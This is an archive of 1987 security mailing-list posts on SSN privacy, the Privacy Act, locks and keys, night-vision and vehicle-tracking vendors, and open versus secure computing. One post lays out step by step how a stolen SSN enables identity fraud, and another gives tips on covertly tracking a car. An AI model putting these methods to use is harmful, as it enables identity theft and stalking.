Date: Mon, 5 Oct 87 09:33:45 cdt
From: Jonathan Harris
Subject: SSN's why get so upset about it.
After all this talk of people not giving out social security numbers to utilities and such, I have yet to hear anyone explain what is the harm in giving it out and why it is worth all of this fuss. True, the social security number is really meant for social security and tax administration, but what harm can someone do if he finds your SSN? Apparently nothing; that is, unless you are a deadbeat intending to skip town and refuse to pay your phone/electric bill.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Mon, 5 Oct 87 21:51:27 EDT
From: Douglas Humphrey
Subject: Re: ssn's

>So the real question is this:
> How many databases list my MIT 888 number as my SSN

I would hope that most people's databases have some sort of validity check on SSNs, since you can call the SSA and get a definition of the SSN from them, and it does mention at least some of the field values that are 'not right'. I saw a spec for this stuff about 5 years ago, perhaps in a Government RFP or something. Maybe a call to the SSA would answer this?

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 06 Oct 87 08:53:04 EDT
From: "A. Harry Williams"
Subject: Re: Digest of SSN responses

I find the response to both SSN and phone numbers as "If you don't have anything to hide, why not give it out". That is the same argument as if the defendant doesn't take the stand in a criminal trial, he must be guilty. Also, I'm not sure that US SSNs have a checksum. My sisters and I have consecutive SSNs.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 6 Oct 87 12:20:01 EDT
From: Larry Hunter
Subject: Re: Why Protect SSNs?

Well, the practical reasons to associate your SSN with as few records about you as possible have to do with the fact that large, powerful entities (like the IRS and large consumer products companies) use techniques like block modelling and record matching to exert unpleasant power over individuals.
For example, the IRS uses social security numbers to look up credit ratings and self-described income data associated with consumer purchases (those little warranty registration cards...) to audit people it thinks may be under-reporting income. Big credit and insurance concerns use SSNs to find records that can penalize you by denying you credit or insurance on the basis of information that you rarely see and never know how they get. Other uses include targeting the marketing of consumer products and matching government records against each other or commercial records. Those large tax, law enforcement and marketing data analyses are more difficult to do on someone who withholds SSN.

Unfortunately, the cause of most of the trouble is invisible to the people who get screwed. Nobody says "we decided to audit you (investigate you, use this ad on you) because of information we could analyse based on your SSN." It is quite difficult to track down the explicit uses of SSNs within specific organizations; they are not interested in baring their data analysis techniques to outsiders at all.

So for illustrative purposes, let me show how with your social security number and a little motivation someone can learn all of the intimate details of your life, ruin your credit rating and get warrants issued for your arrest:

Your enemy gets your social security number. He goes to the local department of motor vehicles and gets a driver's license in your name by telling them he lost it and giving them your SSN. Knowing your driver's license number (SSN in many states) is usually sufficient ID for getting a replacement license. He takes the driver's license to the social security office, tells them the appropriate SSN and asks for "his" payment record. They tell him your employer, your income, any interest bearing bank accounts you have and any securities you have bought or sold in the last 3 years and some odd months.
He can find out the medical insurance company used by your employer and get your medical records from them in a similar way. He can also use the employment information along with your SSN to get credit cards in your name (credit card grantors use SSNs to access your credit records, and want little information on you other than SSN, employer and bank accounts). After buying a fast new car on your credit, he gets a lot of speeding tickets on your license. The criminal warrants that show up when he doesn't pay the tickets are attached to your social security number. If he really wants to get you in trouble, he gets busted for drunk driving or hit and run on your license, makes bail and throws the license away. You now have a mountain of bad debt and a felony arrest warrant, not to mention an enemy who knows every penny you have, what your credit record is like and all of your medical history. He got it all by just knowing your SSN.

Paranoid? Sure. I don't think this sort of thing happens very often, but it provides an idea of the power in those 9 digits. I personally believe that the institutional (mis)use of SSNs is by far a worse problem than the kind of criminal behavior I just described, but I find the latter is more persuasive to people who are cavalier about having "nothing to hide". Try reading David Burnham's "The Rise of the Computer State" or his upcoming book on the IRS, or Robert Ellis Smith's "Privacy: How to Protect What's Left of It" for more detailed discussions.

Larry Hunter

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: 6 OCT 1987 22:51:13 EDT
From: "Bryan, Jerry"
Subject: Digest of SSN responses

The Privacy Act of 1974 does *not* mention universities by name. I quote as follows:

"Sec. 7.(a)(1) It shall be unlawful for any Federal, State or local agency to deny to any individual any right, benefit, or privilege provided by law because of such individual's refusal to disclose his social security account number."
That all sounds well and good, except for the following little "gotchas".

1 -- The original Privacy Act included the following exception: "(2) the provisions of paragraph (1) of this subsection shall not apply with respect to (A) any disclosure which is required by Federal statute". Note that "disclosures which are required by Federal statute" are legion. For example, open a bank account, register for the draft, etc.

2 -- The privacy act is grandfathered, so that anybody doing it before January 1, 1975 can keep doing it.

3 -- Congress has passed many, many exemptions and exceptions to the original Privacy Act, the worst of which is specifically authorizing states to use SSN's for driver's licenses and vehicle registration (Tax Reform Act of 1979).

4 -- The clause in the original law making it apply to "any right, benefit, or privilege provided by law" is a pretty stiff test, according to lawyers who handled a SSN refusal case for me. It is pretty hard to convince a judge that attendance at a university is a "right, benefit, or privilege provided by law". And even if you did, the laws establishing universities in most states are ones which have been exempted from the Privacy Act by subsequent legislation (the Tax Reform Act of 1979).

5 -- The original Privacy Act contained no penalty for violation. Again, according to my lawyers, a law with no penalty is essentially unenforceable. What is needed is something like a $1000 fine for every violation. Can you imagine how quickly a university would straighten up if it had to pay $1000 for every student for which it used an SSN as a student ID?

As an example of how tangled these webs can become, both the folks giving ACT tests and SAT tests key the results off of SSN's, and these are private organizations utterly uncovered by any privacy legislation. Most (all?) universities that receive ACT and/or SAT scores match them up with their students via SSN's.
Thus, universities have a valid, practically mandatory reason for having the SSN for all students on file, even if they do not use SSN for student ID. Furthermore, if the university is involved at all in the disbursement of federal money to students (various student loans, etc.), the feds will *require* SSN's for all the students involved. What's the poor university to do? Finally, grant applications to such agencies as National Institute of Health and National Science Foundation require the SSN's of all professors and students who will use the money. Again, what is the university to do?

It really is too late, folks. Big Brother is already here, alive and well. And even Mr. Reagan with all his "get the government off the back of the people" rhetoric has greatly expanded Big Brother, provided only that it is in support of his declared social goals -- catching welfare cheats and such. The ends do justify the means, you know, as long as it is your own ends you are after.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: mtune!mtgzy!norm@RUTGERS.EDU (n.e.andrews)
Subject: Re: ssn's
Date: 7 Oct 87 15:29:29 GMT

> Why bother? What horrible deed can be done with it that makes it worth
> not giving it out and the hassle that might follow?

False income tax returns could be filed against someone's social security number. I suspect the consequences of that could qualify as a hassle...

There must be other bad things that could be done using people's social security numbers, all of which could cause the real owner a lot of unnecessary trouble. I never did like the idea of tying the unlimited power of the State so intimately to everyone's personal business...

-Norm Andrews, speaking for himself

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: matt@oddjob.uchicago.edu (Godfather to putty-tats)
Subject: Re: ssn's
Date: 9 Oct 87 21:28:58 GMT

Guess who asked for my SSN this week. The Phone Company. I was ordering new service preparatory to moving and they first asked for employment information.
I said "You don't really need that, do you? I'm a current customer and you know I pay my bills." The clerk said "Just a moment", then read me my employer's name and my (previous) title! Then she asked for my SSN to "complete their records". I hollered quietly and she said, "Actually, you can decline."

Matt Crawford

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: mcb@lll-tis.arpa (Michael C. Berch)
Subject: Re: ssn's
Date: 8 Oct 87 23:06:48 GMT

This came up before in a Usenet newsgroup and is worth reiterating here. Look: I don't care what your feelings about giving out SSNs are, or what effect it has on your privacy, or how the country is going to hell in a handbasket because of the pervasive use of SSNs. Just DON'T, under any circumstances, just "make up a number" and give it out. The odds that it is already assigned are substantial. (And don't weasel around about how the 900's aren't used for SSNs; they're used by the IRS as "Taxpayer Identification Numbers" (TINs) and belong to people/corporations, too.) If I got tangled up in a bureaucratic mess about some purchase or payment or tax matter because some pinhead "made up a number" and it happened to be mine, I would be massively (and justifiably) pissed off. "Making up a number" is an anti-social, offensive thing to do, and one that (even given my laissez-faire, anti-authoritarian point of view) I would not hesitate to report to criminal authorities if I discovered it.

Michael C. Berch
ARPA: mcb@lll-tis.arpa
UUCP: {ames,ihnp4,lll-crg,lll-lcc,mordor}!lll-tis!mcb

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sun, 11 Oct 87 23:06:51 EDT
From: lear@aramis.rutgers.edu (eliot lear)
Subject: Re: ssn's

Hi Curios,

If someone wants to do a credit check on you, generally they need only your ssn and your permission. If they don't have the latter, they shouldn't have the former.

Eliot

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Mon, 12 Oct 87 08:31-0700
From: The Bandit
Subject: moron social security numbers.
I have seen numerous messages fly by these past few weeks regarding the sense (or nonsense) of keeping one's ssn private. All too often people declare that ssn's are unique. Would that this were true, but, unfortunately, it is not. Because uniqueness is not guaranteed, I prefer not to give out my ssn. I certainly wouldn't want someone's tainted credit rating affecting my rating, nor would I wish to demolish someone else's -- were such dire things to occur.

Derek Haining
Academic Computing Services
University of Washington
Seattle, Washington
(206) 543-5852
DEREK@UWARITA.BITNET -or- DEREK@RITA.ACS.WASHINGTON.EDU

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Fri, 16 Oct 87 11:02:00 EDT
From: "Una R. Smith"
Subject: SSN

Yes, it's much easier for people to manipulate information about you in a computer when they have your SSN, since it's a variable that can be matched so easily. But the flip side of that coin is what worries me. Think how easy, with a NINE digit number, it is for data coders to make keystroke errors. Of course this can happen with your name, but names have familiar patterns, or are very unfamiliar. Either way, the rate of error should be lower for coding names. But even if it isn't, that's ok, because few (if any) organizations with information about you will ever even attempt to merge data by your name. If 2 files are being combined, and your name is the common variable, and there is an error in 1 name record, there is no match. But if the SSN is used, and a coding error has occurred, there is the chance that SOMEONE ELSE'S history will be appended to your name, either under your SSN, or under theirs, depending on the coding error. Now, if you are a bad customer or whatever, you don't really care if this happens, because the chances are your history will only be improved. But if you are one of those sterling types who always pay on time, etc. and you "have nothing to hide, so why not give the SSN without a fuss", you might be burned badly.
And even if the error isn't terrible, getting the problem fixed can take a long time. Just try telling someone that their records on you are WRONG, especially if they have them on a computer. The chances are high that you will only get to talk to someone who either 1) believes computers don't make mistakes, or 2) is afraid of the computer, or 3) doesn't know how to correct the records on you, since they are hidden in the computer, and doesn't want to bother finding out, or 4) CAN NOT change the data in the computer because someone down the line never imagined that changes would be necessary. If you think any of the 4 cases above is unrealistic, let me assure you that I know of instances of all 4 cases occurring.

My mother is still fighting the property tax administrator in her city after 2 years because the records she got out of his computer database, thanks to a naive underling, do not agree with the tax assessments people in her neighborhood have been paying. The difference, she has discovered, amounts to nearly a million dollars annually coming out of single family residences instead of apartment complexes. The tax administrator's office has been stonewalling for over 2 years because they won't admit that there is no way, currently, for them to get to the actual data; they insist "the printout is wrong." This is clearly an example of case 4 above, with maybe a little old-fashioned corruption thrown in for good measure.

Recently someone said he hadn't withheld his SSN in the past, so there is no point to beginning now. I strongly disagree. No one is going to make any great effort to match SSN's to data about you by hand, and it's unlikely that if they do have your SSN that they also have a way of looking at your name and address via computer. After all, the SSN is so handy just because it lets merchants, etc. treat your name as just the first line of your address.
The format is often free-form, and it is difficult to extract your name in program-driven databases. They certainly won't get any help from the SS Administration.

From: tektronix!reed!percival!jamesd@cad.Berkeley.EDU (James Deibele) 4-Nov-1987 03:08:04
To: reed!tektronix.UUCP!ucbcad!red.rutgers.edu!security
Subj: [1265] Re: forwarded mail

Sorry for the lack of clarity. Tests in stores showed that there was a shortage rate of 30% in stores that weren't protected by the Knogo systems. That figure includes employee theft, shoplifting, miscounts of shipments (the clerk counted 13 when there were only 12), and so forth. The major components of the shortage figure are the first two.

It's very easy to put a piece of software in a bag and walk out with it. Dalton's uses 6-foot shelves, which the clerks can't see over (legacy of the bookstores, where an individual item isn't worth all that much---software, however, goes $300, $400, even $700). The impulse shoplifter --- "I want Gunship, but I don't want to pay $35" --- is deterred by the increased risk of apprehension (supposedly), and they make up the most part of Dalton's shoplifting problem. Kids after school killing time in the mall, etc. won't take the chance if they think there's a high risk of getting caught. Sort of similar to radar --- people think it works better than it actually does. Fortunately, there are fewer thieves than speeders.

From: IWAMOTO%NGSTL1%eg.ti.com@relay.cs.net 4-Nov-1987 17:49:18
To: security@RUTGERS.EDU
Subj: [1422] RE: the KEY Discussions

Interesting things coming thru on all this KEY stuff. I've got a couple of questions which deal with the mechanics of a couple of keying systems. Wish I could remember the names of the manufacturers, but I'll just have to plead brain death. The two key systems worked (I believe) in completely different ways (or at least, the mechanisms were very different). One had no slots, per se.
Instead, it essentially looked like a blank with a number of dimples of differing sizes drilled on both sides of the blank.

The second system was supposed to have been THE keying system of that time (this is all from my college days, about 11 years ago). This system had keys which had the cuts not only at the normal angles of +/- 15 (?) degrees but also had the cuts themselves offset at (I believe) +/- 5 degree angles. In other words, instead of just making the cuts at an angle perpendicular to the key, the cuts were offset at angles of 0, +5 and -5 from the perpendicular. I know I'll recognise the name of the keying system as soon as someone mentions it, but right now, I'm completely brain dead.

Anyway, the question is... How does each of the above keying systems work?

Warren M. Iwamoto
Artificial Intelligence Laboratory
Texas Instruments, Inc.
Dallas, TX.
iwamoto%ngstl1@eg.ti.com

From: mark@ems.mn.org (Mark H. Colburn) 5-Nov-1987 06:28:39
To: misc-security@RUTGERS.EDU
Subj: [1037] Re: DES is NOT legally required

I was discussing encryption with some of the CYBER gods who work at Control Data Corporation here in Minneapolis. Apparently, when they initially started shipping their latest release of NOS, they were going to use this hot new encryption algorithm which somebody at CDC came up with. However, when they decided that they were going to ship the software out of the country, they found that the NSA (I believe; it has been a while) was requiring that they provide the algorithm for deciphering an encrypted message. Apparently there was no limit on how complex the solution was as long as it was guaranteeable that the algorithm did work. Eventually they gave up on the new encryption method, since they could not come up with an algorithm which would work.

--
Mark H. Colburn          DOMAIN: mark@ems.MN.ORG
EMS/McGraw-Hill          UUCP: ihnp4!meccts!ems!mark
                         AT&T: (612) 829-8200

From: Larry Hunter 6-Nov-1987 02:19:18
To: security@red.rutgers.edu
Subj: [1546] Bumper Beepers.
Some interesting tidbits for tracking automobiles:

Bumper beepers are great, but get some practice before you depend on one. Signals reflected off buildings, obscured by underground garages, rapidly accelerating as they get on the freeway, etc. are all confusing. Following a vehicle without being detected takes practice. The beeper just makes it possible to do with one tail car instead of two or three. With an aircraft, one of these guys can identify the location of a vehicle within 25 or 50 miles. Have fun!

Places to buy:

Wynn Engineering / 4327 Aspenglen Dr. / Houston TX 77084 sells a bumper beeper set that "When installed on your car, you can track the distance and direction of the car from up to 2 miles away. Beeper and special receiver (Model BB 1101) $600 for the set."

Law Enforcement Associates / 88 Holmes St. / Belleville NJ 07109 sells a better system (made by TRACER) called the 1012 Vehicle Follower System. It's better because the beeper beeps instead of emitting a continuous tone (saves on batteries!) and it gives a more specific readout of the direction of the target. Expect to pay over $1000. Write for a current catalog.

And by the way, US Citizens have no reasonable expectation of privacy regarding movements tracked in public, said the Supreme Court in 1983: US v. Knotts, 103 S. Ct. 1081 (1983).

Larry

From: marks@Sun.COM (Mark Stein) 6-Nov-1987 16:29:41
To: security@red.rutgers.edu
Subj: [611] re: master keys

> Talking about master keys and such, has anyone seen a type of
> key that has no teeth and it is just a straight piece of metal?
> I think they had "safety" stamped on them but I am not sure.
> When I was a little kid I had a couple but never found out what
> they were for.

I remember seeing one of these a long time ago. As I recall, they were provided with bathroom (indoor) locksets. They were intended to go through the hole on the outside knob to unlock the door.
--Mark Stein

From: *Hobbit* 7-Nov-1987 23:20:06
To: security@RED.RUTGERS.EDU
Subj: [503] kappy kludges fern frob

If you leave the coil of a relay across the line all the time, it probably will never hang up properly. If the DC resistance happens to be high enough to allow on-hook [good luck] you'll still create a leak path and lose big when it rings. If you want to sense line voltage quietly, use something involving a 40v zener, a FET, and an optoisolator or something...

_H*

From: padwa%harvsc3@harvard.harvard.edu (Danny Padwa) 4-Nov-1987 08:51:05
To: "security@red.rutgers.edu"%hucsc@harvard.harvard.edu
Subj: [1482] Microcomputer Software Security

At Harvard, several of our classes require the use of micros, and we handle software for them as follows:

When students wish to use the microcomputer software, they come into the User Services office (right by the micro room). Although US people (such as myself) are primarily responsible for mainframe questions, they also loan out the software. The first time a student comes in to borrow software, they sign a waiver, effectively promising not to steal, copy, or eat our disks. Then, they can take out software whenever they want (the question-answering people are there 8AM-midnight weekdays, and almost that on weekends), just by presenting their IDs (held only for "important" software----I didn't make up this policy!!!) and signing the software out in our log... pretty straightforward.

The only real problem we've had with this is that the User Services people get bogged down dealing with the micro software and cannot devote enough attention to the big machines (they also have to run backups). But all in all it is a pretty good system, and can work extremely well if you have a work-study student (or the like) handling the library (most students will love a job where they can do a significant amount of homework while working!!). Good Luck!!!
Danny Padwa
Harvard University

From: webber@brandx.rutgers.edu (Webber) 8-Nov-1987 05:11:12
To: misc-security@RUTGERS.EDU
Subj: [1244] paranoia is not the issue

> You _can_ freeze the system and audit it from the outside. On my
> system I would build an audit program on a bootable floppy and
> keep it in a safe place. I'm not that paranoid - I believe that
> I'm not a sufficiently desirable target to expect really sophisticated
> viral attacks.

It is not really an issue of being a specific target. Recent trojan horse problems reported on the micro boards seem to be traceable back to code put on disks by software vendors as an effort at copy protection. The subsequent victims being merely people who traded disks with people who traded disks with people who traded disks with people who maybe pirated software. Ultimately, a well-written destructive virus is much like a bomb in the marketplace -- lots of bystanders who weren't aware they were part of a quarrel. And considering the other bugs in vendors' software, it is not all that unreasonable to expect that occasionally their copyprotect stuff will misfire -- sort of puts a new light on all those disclaimers, don't it?

------ BOB (webber@aramis.rutgers.edu ; rutgers!aramis.rutgers.edu!webber)

From: hpscda!hpscdl!hplabs!well!rab@seismo.css.gov (Bob Bickford) 8-Nov-1987 06:42:36
To: security
Subj: [555] Re: master keys

Jose Rodriguez writes:
+ Talking about master keys and such, has anyone seen a type of
+ key that has no teeth and it is just a straight piece of metal?

They're magnetic, assuming we're talking about the same thing. The matching lock has an inverse set of magnets and will open when you hold the key next to it (or inside it, on some).

--
Robert Bickford {hplabs, ucbvax, lll-lcc, ptsfa}!well!rab

From: Jeff Rothenberg 8-Nov-1987 17:09:38
To: sundc!netxcom!dgidez@seismo.css.gov (Daniel Gidez)
Subj: [408] Re: night scope

I gather you do not know about Edmund Scientific.
They are a catalog house with all sorts of stuff like this (plus lots more). They are:

Edmund Scientific Co.
101 E. Gloucester Pike
Barrington, NJ 08007
1-609-573-6250
1-609-547-3488

From: *Hobbit* 9-Nov-1987 05:57:30
To: security@RED.RUTGERS.EDU
Subj: [581] Internal setscrews

The from-the-inside setscrews that Best is infamous for aren't a guarantee against tampering. A certain proportion of the locks in a large campus system will "default" to the control shear line during picking. A determined individual *will* eventually manage to obtain one; there's not a lot you can do about it short of posting guards at all the doors. Does Medeco or Abloy have any such mechanism? *That* would make things pretty difficult...

_H*

From: TS5864%OHSTVMB.BITNET@jade.berkeley.edu (Thomas Lapp) 9-Nov-1987 08:56:12
To: SECURITY@red.rutgers.edu (Security Digest)
Subj: [1265] RE: LoJack Homing device

I recall seeing a television segment on LoJack (20/20?). In the segment they indicated that, yes, it wasn't cheap, and yes, it worked for several dozen miles. However, it *does* require that the police install the activation transmitter on a high point, and requires fitting the cruisers with LoJack receivers. The cost of this is prohibitive except for areas of high auto theft. At the airing of the segment on TV (several months ago), LoJack was only in use in the Boston, MA area. Several other cities were looking into it, but had not made any decision to go ahead. So unless you live in the Boston area, you are out of luck when it comes to LoJack.
-tom
=======================================================================
Thomas Lapp                                     | "Never Sniff a Gift
                                                |  Fish"
BITNET:   TS5864@OHSTVMB.BITNET                 |
ARPA:     TS5864%OHSTVMB.BITNET@wiscvm.wisc.edu |
INTERNET: LAPPT@ee-eagle.ohio-state.edu         |
=======================================================================

From: gwyn@brl-smoke.arpa (Doug Gwyn ) 9-Nov-1987 15:12:38
To: misc-security@uunet.uu.net
Subj: [696] Re: untoothed keys

Jose Rodriguez writes:
>Talking about master keys and such, has anyone seen a type of
>key that has no teeth and it is just a straight piece of metal?

There are several keys that could fit such a description. Were there ANY external encodings at all, such as wiggly grooves (Bell lock) or dimples (Sargent KESO)? If not, this may have been a magnetic key. There were some cheap padlocks that one opened by placing a flat key against the side; embedded magnets reacted on magnets inside the lock to align gates. That lock yielded easily to physical force, however.

From: Mike Linnig 9-Nov-1987 23:44:02
To: security@RUTGERS.EDU
Subj: [819] master key security

Doug Gwyn's comments about some locks being somewhat difficult to remove unless you have the control key brings the following to mind...

What will the administration do if they find such a lock has been removed by brute force (i.e. saber sawing it out of the door)? Surely this implies that the whole master keying system is compromised. Ideally, they would rekey all the locks. In practice I assume that they would shrug their shoulders and hope no one starts using master keys. It must be very expensive to rekey all the locks on a campus.

Mike Linnig

ps. I too do not advocate property damage, but it is amazing how vulnerable these systems are to thoughtful attack.

From: Bill Sommerfeld 9-Nov-1987 21:39:13
To: *Hobbit*
Subj: [402] Re: hotel deadbolt hacks

> Probably against fire regs, but it works.

I don't see why; all that matters is that you be able to get OUT, not that others be able to get in..
besides, fire fighters have a reputation for using an axe when a doorknob would do.

- Bill

From: warren hik 10-Nov-1987 12:21:56
To: SECURITY@RED.RUTGERS.EDU
Subj: [2569] RE: PC Lab Security

>> Have one PC in your lab designated as a file server. Student
>> must bring their own floppies and copy any needed software
>> off the (read-only) hard disk of the file server onto THEIR OWN DISKS.

>Doesn't this present some legal problems due to the copyright laws?
>Doesn't this also present some technical problems due to copy protections?

It is legal, and widely accepted on the following terms.

a) the software is licensed for a certain site.
b) the copy of the original software (by the student) is only used at the licensed site.
c) the copied software is for the exclusive use of the student.
d) the student must sign a contract stating that they will not let anyone else use the software, nor will it be run (used) OUTSIDE of the licensed lab environment. The software must also be deleted at the end of the required course period.

Breaking any of which is punishable by fine (equal to that which may be charged the license site for breaking copyright) or EXPULSION.

>At BC, I believe we presently use a Check-Point security system. This system
>is easy to fool if you know a trick or two, but has served as a GOOD deterrent

This is a "Good Deterrent": By using the already existing copyright laws, and those of the institution regarding expulsion (one would want to believe that they were created for some purpose).

An example of using the LAW as the deterrent over spending many more dollars for electronic security devices, clerks and security officers, and computer administration and accounting is: Stop signs. That's right, why do we stop at a stop sign if it is 2:00 a.m. and there are no other cars in sight?? Because it is the law. If you go through and are caught (big IF here!)
you face a $53 fine, some demerit points, and surely when your insurance company finds out about this, you could face a rude awakening in premium prices (don't take my word for it, contact your local newspaper and find out the number of people in your city that complain about being shafted by insurance companies (particularly car insurance)).

Anyway to make a long story short, if the system can be fooled by those who really want to, use existing laws to deter people, not expensive machinery and people who could be used more effectively helping others with problems or doing research of their own, instead of being glorified secretaries.

Sorry for rambling.

-Warren.

From: "Michael A. Shiels" 10-Nov-1987 12:22:00
To: misc-security%math.waterloo.edu@relay.cs.net
Subj: [631] Re: Securing Floppy's

There is another solution to the software stealing problem. Install a protection ROM into the motherboard and then each one of the .EXEs or .COMs is run through an encryptor and will require the ROM to work properly. It seems to work great on campus here. Look in comp.newprod for an announcement of MaS-DProtect and MaS-RProtecty

--
Michael A. Shiels (MaS Network Software)
mshiels@orchid.waterloo.EDU
UUCP: ...path...!watmath!orchid!mshiels

From: herbison%ultra.DEC@decwrl.dec.com 11-Nov-1987 11:42:24
To: Security@Red.Rutgers.EDU, HERBISON@decwrl.dec.com
Subj: [3306] Re: Why secure systems?

Nick Papadakis presents an essay by RMS that argues that computers should be open rather than secure. This may work for many computers, but I believe it is wrong to take this approach for all computer systems. The main reason for my belief is that large numbers of computers are used for critical operations of various types.

RMS says that vandalism `was very rare' on the systems he used as an example. This means that there were very few people vandalizing the system just because it was there (the vandals had no other reason to do damage).
But for many computer systems, there are other reasons to do damage: To hurt the organization that runs the computer. To gain financially. To change the `real work' done by the computer.

Imagine running the following computers openly, without security:

- A computer that handles the payroll and accounting for a corporation. A `minor' piece of vandalism could bankrupt the corporation and ruin the lives of employees that financially survive from check to check.

- A computer used to develop the software for a piece of hospital equipment. Errors caused by someone who didn't know what they were doing could endanger the lives of large numbers of people.

- A computer that is used to count votes. The basic freedoms that we have in this country depend on fair votes, but insecure voting systems could allow any fanatic to change the result of a vote and of history.

- A computer that supports the operation of the stock market. In a few minutes a compromised computer system could place enough fake sell orders to make the October crash look minor. Sure, eventually it would be detected that the original sell orders that triggered the crash were fake, but by that time the world economic system would be a shambles and saying `let's forget all of the trades on all the markets in the last week' wouldn't work.

Running an open computer system is a great idea, and should be done whenever possible. But don't do it when sensitive operations are on the line (including, but not limited to, finance, investment, accounting, health, personal data, and voting). Or at least wait until it can be shown that people can be trusted. A suggested metric: When a year passes without any instances of fraud or robbery worldwide.

Our need for computer security just reflects the fact that we cannot trust that all members of society will always act for the benefit of society. As long as this is true it isn't safe to open all computer systems to everyone.
Criminal acts did not start with computers, and I don't believe that opening up computer systems will end criminal acts.

B.J.

From: UJ0%psuvma.bitnet@RUTGERS.EDU 11-Nov-1987 15:33:53
To: rutgers!misc-security@e.ms.uky.edu
Subj: [3324] Re: night scope

There are lots of places where you can allegedly get night vision devices... I'm not sure if they're all bona fide. However, a few that come to mind are:

NIGHT VISION DEVICES:

AN/PVS-3A starlight scope     Excalibur Enterprises
AN/PVS-4 starlight scope      P.O. Box 266
AN/PAS-4 IR scope             Emmaus, PA 18049
AN/PAS-6 IR scope             (215) 791-5710
(military issue)

IR binocs, scopes             CCS Communication Control, Inc.
                              160 Midland Ave.
                              Port Chester, NY 10573
                              (914) 934-8100

AN/PVS-2 ind. weap. sight     LRRP Security Services, Inc.
AN/TVS-2 crew weap. sight     Box 1620
(military issue)              Aiken, SC 29801
                              (803) 649-5936

AN/PAS-5 IR binoc/goggles     G.S.A.D. Inc.
(Israeli army issue)          205 South Kuhn Drive
                              Manhattan Beach, CA 90266
                              (213) 374-4086

scopes, binocs...             LEA Law Enforcement Associates
                              700 Plaza Drive
                              Harmon Meadows/Route 3 West
                              Secaucus, NJ 07094
                              (201) 864-0001

AN/PAS-5                      The Dutchman
                              P.O. Box 12548
                              Overland Park, KS 66212
                              1-800-821-5157

scopes, binocs...             Microtron
                              42-38th Street
                              Wheeling, WV 26003
                              (304) 233-8007

LASER GUNSIGHTS/TARGET DESIGNATORS

                              Executive Protection Products, Inc.
                              1834 First St., Suite S
                              Napa, CA 94559
                              (707) 253-7142

                              API Marketing
                              1600 Monrovia Ave.
                              Newport Beach, CA 92663
                              (714) 722-9087

Some of these companies sell active IR systems for as low as $400 or less... the starlight scopes are certain to be at least around $1000.
While I'm not in a position to make any endorsements or recommendations ("just an interested observer"), obviously ambient IR and starlight scopes are the best, since no external light source is involved (with the other systems, someone else with an IR system will see your 20,000 candlepower searchlight plenty fine as you slink through the foliage thinking you're invisible) but it all depends on what you plan to use it for. Definitely keep in mind that these, as with all electronic devices, have very delicate innards, and as a weapon sight, it will take quite a bit of abuse (rifle recoil, temperature, humidity) so get the beef on it from the people you're dealing with. Another good way they can quickly get toasted is from an overexposure (someone shining a light into your image intensifier, a sudden heat source appearing, etc...). Some are protected, but I believe many aren't.

That's about all I can contribute for now... let me know how you make out.

From: bzs@bu-cs.bu.edu (Barry Shein) 11-Nov-1987 15:59:54
To: nick%MC.LCS.MIT.EDU@eddie.mit.edu
Subj: [3168] Why secure systems?

Richard is basically correct about his social assessment of centralized computing services. He characterizes the situation as being akin to the Soviet Union, I would say more like martial law in a scarce resources situation (which, some argue, is really what explains the current situation in the Soviet Union, sort of an emergency restriction on freedom that has been convenient to leave in place these 70 years, for some.)

Today the situation of the central computing facility is becoming more curious. The resources are no longer terribly scarce but the "oligarchy" continues in their ways. For example, on our large IBM a student account is assigned about 1MB of disk storage (max.) He can of course try to ask for more but the bureaucracy can be very discouraging. That's about the storage of a single floppy disk in today's world.
How ludicrous it must look to a student who just bought a PC with a 20MB disk for $900 that he is far more limited on this $6M machine! Other resources are similarly restricted (e.g. the biggest memory image anyone can run is 11MB even tho it has 64MB physical, and this is touted to the campus as some sort of super-computer, achh, pfft.)

The focus is no longer on the cracker. What is happening today is that these computing organizations are becoming wholly irrelevant to anyone other than a very small sector of the community with very special needs (such as to run the big name packages, for example last I looked it was hard to get a paper published in medical fields that didn't present its statistics as having been produced by one of a few well known packages.) Hence people are simply going out and buying their own systems in droves and, for the more ambitious, purchasing servers of their own to help integrate an environment of quite a bit of power.

The last stand for the computing center is the network, it's the last bit of centralized service that anyone is interested in getting from them. I notice that many of them have a lot of trouble with the fact that they cannot produce accounting charges for ethernets. So they find other ways to bang people over the head with the cable (restrictions in gateway software, per-port charges etc.) It's all futile really and just a tragi-comic last hurrah for the vested oligarchy. People I speak with will gladly build their own little networks etc, even if they're less effective, if the central organization becomes too overbearing with their backbone.

I guess what I'm saying is that RMS's note is true but technology has removed most of the motivations. No one views the central computing facility as having the good toys anymore, envy is gone, heck, interest is gone, we've developed a whole breed of people here now who have never even used the central facilities (around here that would be a shocking statement in the right crowd.)
Most of these folks correspond very closely with the sort of crowd who would have produced the hackers (e.g. computer science, computer engineering etc.)

-Barry Shein, Boston University

From: ron@topaz.rutgers.edu (Ron Natalie) 11-Nov-1987 17:40:19
To: misc-security@RUTGERS.EDU
Subj: [201] Re: hotel deadbolt hacks

Not against fire regs to my knowledge. Firemen don't use keys.

From: shore@epiwrl.epi.com (John Shore) 11-Nov-1987 19:00:06
To: misc-security@uunet.uu.net
Subj: [388] IR detector recommendations?

I want to install an IR-detector with @al horn to improve the security in a small business office. Is there a brand that does the job reliably and that doesn't cost too much?

js
-
John Shore
shore@wrl.EPI.COM
...uunet!wrl.epi.com!shore

From: brock@pnet01.cts.com (Brock Meeks) 11-Nov-1987 19:01:58
To: crash!security@rutgers.arpa@bass.nosc.mil
Subj: [878] Picking locks on pay phones

Here in San Diego we've had an unusual round of news reports about "a man with a pony-tail" that is "the only known person in the U.S. that can pick the lock on pay telephones. He is known to frequent Country and Western bars and carry large amounts of change." He is said to reap about $2,000 a day from his "speciality." The police say there are "tell-tale scratch marks" on the phone lock boxes.

Question: Is there any truth to these news stories? Is it possible that only one person in the U.S. can pick the lock on a pay telephone? If so, what makes these locks so damn hard to pick. (And, in what sounds like an easy way to pick up a good piece of spare change, why isn't this activity more widespread?)

From: *Hobbit* 11-Nov-1987 06:28:48
To: security@RED.RUTGERS.EDU
Subj: [3461] Iwamoto's lock questions

